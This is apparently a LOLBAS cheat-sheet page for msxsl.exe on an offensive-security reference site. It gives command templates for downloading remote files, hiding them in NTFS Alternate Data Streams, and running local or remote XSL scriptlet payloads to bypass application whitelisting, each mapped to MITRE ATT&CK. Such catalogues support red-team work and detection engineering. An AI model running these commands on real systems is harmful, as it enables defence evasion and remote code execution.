🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / msxsl.exe

msxsl.exe

Command line utility used to perform XSL transformations.

ADS

Download a file from the internet and save it to an NTFS Alternate Data Stream.

msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name

Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS). — MITRE: T1564 — Privileges: User

AWL Bypass

Local execution of script stored in XSL file.

msxsl.exe {PATH:.xml} {PATH:.xsl}

Run COM Scriptlet code within the script.xsl file (local). — MITRE: T1220 — Privileges: User

Local execution of remote script stored in XSL script stored as an XML file.

msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}

Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). — MITRE: T1220 — Privileges: User

Download

Download a file from the internet and save it to disk.

msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}

Using remote XML and XSL files, save the transformed XML file to disk. — MITRE: T1105 — Privileges: User

Execute

Local execution of script stored in XSL file.

msxsl.exe {PATH:.xml} {PATH:.xsl}

Run COM Scriptlet code within the script.xsl file (local). — MITRE: T1220 — Privileges: User

Local execution of remote script stored in XSL script stored as an XML file.

msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}

Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). — MITRE: T1220 — Privileges: User